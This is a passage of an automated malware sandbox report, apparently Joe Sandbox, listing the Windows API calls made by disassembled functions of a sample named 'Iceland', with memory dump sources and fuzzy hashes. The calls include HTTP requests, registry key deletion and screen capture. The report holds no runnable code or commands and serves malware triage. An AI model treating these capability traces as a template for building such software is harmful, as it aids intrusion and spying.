                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                                                                                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                                                                • API String ID: 354098117-199464113
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetMenuItemCount.USER32(00AF29C0), ref: 00A63F72
                                                                                                                                                                                                                                                                • GetMenuItemCount.USER32(00AF29C0), ref: 00A64022
                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 00A64066
                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 00A6406F
                                                                                                                                                                                                                                                                • TrackPopupMenuEx.USER32(00AF29C0,00000000,?,00000000,00000000,00000000), ref: 00A64082
                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00A6408E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                • API String ID: 36266755-4108050209
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(00000000,?), ref: 00AB7823
                                                                                                                                                                                                                                                                  • Part of subcall function 00A28577: _wcslen.LIBCMT ref: 00A2858A
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00AB7897
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00AB78B9
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AB78CC
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00AB78ED
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00A20000,00000000), ref: 00AB791C
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AB7935
                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 00AB794E
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 00AB7955
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00AB796D
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00AB7985
                                                                                                                                                                                                                                                                  • Part of subcall function 00A22234: GetWindowLongW.USER32(?,000000EB), ref: 00A22242
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                                                                                                                • String ID: 0$tooltips_class32
                                                                                                                                                                                                                                                                • API String ID: 2429346358-3619404913
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A224B0
                                                                                                                                                                                                                                                                • DragQueryPoint.SHELL32(?,?), ref: 00AB9BA3
                                                                                                                                                                                                                                                                  • Part of subcall function 00AB80AE: ClientToScreen.USER32(?,?), ref: 00AB80D4
                                                                                                                                                                                                                                                                  • Part of subcall function 00AB80AE: GetWindowRect.USER32(?,?), ref: 00AB814A
                                                                                                                                                                                                                                                                  • Part of subcall function 00AB80AE: PtInRect.USER32(?,?,?), ref: 00AB815A
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00AB9C0C
                                                                                                                                                                                                                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00AB9C17
                                                                                                                                                                                                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00AB9C3A
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00AB9C81
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00AB9C9A
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 00AB9CB1
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 00AB9CD3
                                                                                                                                                                                                                                                                • DragFinish.SHELL32(?), ref: 00AB9CDA
                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00AB9DCD
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                                                                                • API String ID: 221274066-3440237614
                                                                                                                                                                                                                                                                • Opcode ID: f50f423a1eac5d2d3b059b8c698ea9f77830c55f461d7a80657198f63a7d59f7
                                                                                                                                                                                                                                                                • Instruction ID: 3d59378c1ca7476dc99ba027d00853cebbdc18e2e5b40f282b36662a088e8404
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f50f423a1eac5d2d3b059b8c698ea9f77830c55f461d7a80657198f63a7d59f7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC617B71108301AFC705EF94DD85EAFBBE8FF88750F000A2DF691961A2DB709A49CB52
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A9CEF5
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00A9CF08
                                                                                                                                                                                                                                                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00A9CF1C
                                                                                                                                                                                                                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00A9CF35
                                                                                                                                                                                                                                                                • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00A9CF78
                                                                                                                                                                                                                                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00A9CF8E
                                                                                                                                                                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A9CF99
                                                                                                                                                                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00A9CFC9
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00A9D021
                                                                                                                                                                                                                                                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00A9D035
                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00A9D040
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3800310941-3916222277
                                                                                                                                                                                                                                                                • Opcode ID: 8634cdbcb7f37f8f155da26cf04bf7cfb637f0568c26fc3bf21e178265a2dd65
                                                                                                                                                                                                                                                                • Instruction ID: 80a5f6d68ede5542ee176246049e21a472c4ba21303cf166ca485baac09b6bed
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8634cdbcb7f37f8f155da26cf04bf7cfb637f0568c26fc3bf21e178265a2dd65
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EA516DB5600704BFDB21DFA0C988AAB7BFCFF08794F004519F94696251EB34D9859B60
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00AB66D6,?,?), ref: 00AB8FEE
                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00AB66D6,?,?,00000000,?), ref: 00AB8FFE
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00AB66D6,?,?,00000000,?), ref: 00AB9009
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00AB66D6,?,?,00000000,?), ref: 00AB9016
                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00AB9024
                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00AB66D6,?,?,00000000,?), ref: 00AB9033
                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00AB903C
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00AB66D6,?,?,00000000,?), ref: 00AB9043
                                                                                                                                                                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00AB66D6,?,?,00000000,?), ref: 00AB9054
                                                                                                                                                                                                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00AC0C04,?), ref: 00AB906D
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00AB907D
                                                                                                                                                                                                                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 00AB909D
                                                                                                                                                                                                                                                                • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00AB90CD
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00AB90F5
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00AB910B
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3840717409-0
                                                                                                                                                                                                                                                                • Opcode ID: 30c6285aa688eb4528bfaad7f2fdb8f682b7f9595eda01953f82165602226a9c
                                                                                                                                                                                                                                                                • Instruction ID: 6dfe5fe0377087bfb6c70f2a632a2bfdb50c9cb41379f2aeca152d162e3a296b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 30c6285aa688eb4528bfaad7f2fdb8f682b7f9595eda01953f82165602226a9c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6411675600209BFDB11DFA9DC88EAB7BBCEB89715F108158F905DB262E7309942DB20
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2B329: _wcslen.LIBCMT ref: 00A2B333
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AAC10E,?,?), ref: 00AAD415
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD3F8: _wcslen.LIBCMT ref: 00AAD451
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD3F8: _wcslen.LIBCMT ref: 00AAD4C8
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD3F8: _wcslen.LIBCMT ref: 00AAD4FE
                                                                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AAC154
                                                                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AAC1D2
                                                                                                                                                                                                                                                                • RegDeleteValueW.ADVAPI32(?,?), ref: 00AAC26A
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00AAC2DE
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00AAC2FC
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00AAC352
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00AAC364
                                                                                                                                                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00AAC382
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00AAC3E3
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00AAC3F4
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                                                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                • API String ID: 146587525-4033151799
                                                                                                                                                                                                                                                                • Opcode ID: b720e4c72e608b4299ad2f2526a4b5fb6dff20cef4ce086509898fb9aa80cc96
                                                                                                                                                                                                                                                                • Instruction ID: ee8c71b52d122d64a4064c94326c72a3353f1d9d8d64b5e8a1c15e0cd7620f02
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b720e4c72e608b4299ad2f2526a4b5fb6dff20cef4ce086509898fb9aa80cc96
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1C19D35204201AFE714DF68C584F6ABBE1BF85318F14859CF49A8B3A2CB75ED46CB91
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 00AA3035
                                                                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00AA3045
                                                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 00AA3051
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00AA305E
                                                                                                                                                                                                                                                                • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00AA30CA
                                                                                                                                                                                                                                                                • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00AA3109
                                                                                                                                                                                                                                                                • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00AA312D
                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 00AA3135
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00AA313E
                                                                                                                                                                                                                                                                • DeleteDC.GDI32(?), ref: 00AA3145
                                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 00AA3150
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                                                                • String ID: (
                                                                                                                                                                                                                                                                • API String ID: 2598888154-3887548279
                                                                                                                                                                                                                                                                • Opcode ID: 77de090a9ea181fc1a8035710459489ab01fa1ac93e6f1210b40aa1547c7afbf
                                                                                                                                                                                                                                                                • Instruction ID: 8bb3e31a6d92b55493ce0e9a08d17479d6c759521c4fbdbc23a62dfcf9727265
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 77de090a9ea181fc1a8035710459489ab01fa1ac93e6f1210b40aa1547c7afbf
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C61C276D00219AFCF14CFE8D984EAEBBB5FF48310F208529E555A7250E771A951CF90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A224B0
                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 00ABA990
                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000011), ref: 00ABA9A7
                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 00ABA9B3
                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 00ABA9C9
                                                                                                                                                                                                                                                                • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00ABAC15
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00ABAC33
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00ABAC54
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000003,00000000), ref: 00ABAC73
                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00ABAC95
                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000005,?), ref: 00ABACBB
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                                • API String ID: 3962739598-2766056989
                                                                                                                                                                                                                                                                • Opcode ID: d0263c7bc6ff2855ce772a90682ec027fe6462caf931e8deeb70aa55698a9a3d
                                                                                                                                                                                                                                                                • Instruction ID: 5f0ff47fca7082289ca81dc5c569626b4cc9139594c2a793ddf428998ffa46cb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0263c7bc6ff2855ce772a90682ec027fe6462caf931e8deeb70aa55698a9a3d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 94B17731600219EFDF14CFA8C9847EE7BB6FF54700F188069EC59AB296D770A980CB61
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00A852E6
                                                                                                                                                                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 00A85328
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A85339
                                                                                                                                                                                                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 00A85345
                                                                                                                                                                                                                                                                • _wcsstr.LIBVCRUNTIME ref: 00A8537A
                                                                                                                                                                                                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00A853B2
                                                                                                                                                                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 00A853EB
                                                                                                                                                                                                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00A85445
                                                                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00A85477
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00A854EF
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                                                                                                                • String ID: ThumbnailClass
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A224B0
                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00AB97B6
                                                                                                                                                                                                                                                                • GetFocus.USER32 ref: 00AB97C6
                                                                                                                                                                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 00AB97D1
                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00AB9879
                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00AB992B
                                                                                                                                                                                                                                                                • GetMenuItemCount.USER32(?), ref: 00AB9948
                                                                                                                                                                                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 00AB9958
                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00AB998A
                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00AB99CC
                                                                                                                                                                                                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00AB99FD
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(00AF29C0,000000FF,00000000,00000030), ref: 00A8C973
                                                                                                                                                                                                                                                                • SetMenuItemInfoW.USER32(00AF29C0,00000004,00000000,00000030), ref: 00A8C9A8
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 00A8C9BA
                                                                                                                                                                                                                                                                • GetMenuItemCount.USER32(?), ref: 00A8CA00
                                                                                                                                                                                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 00A8CA1D
                                                                                                                                                                                                                                                                • GetMenuItemID.USER32(?,-00000001), ref: 00A8CA49
                                                                                                                                                                                                                                                                • GetMenuItemID.USER32(?,?), ref: 00A8CA90
                                                                                                                                                                                                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A8CAD6
                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A8CAEB
                                                                                                                                                                                                                                                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A8CB0C
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00A8E4D4
                                                                                                                                                                                                                                                                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00A8E4FA
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A8E504
                                                                                                                                                                                                                                                                • _wcsstr.LIBVCRUNTIME ref: 00A8E554
                                                                                                                                                                                                                                                                • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00A8E570
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                                                                                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                                                                • API String ID: 1939486746-1459072770
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00AAD6C4
                                                                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00AAD6ED
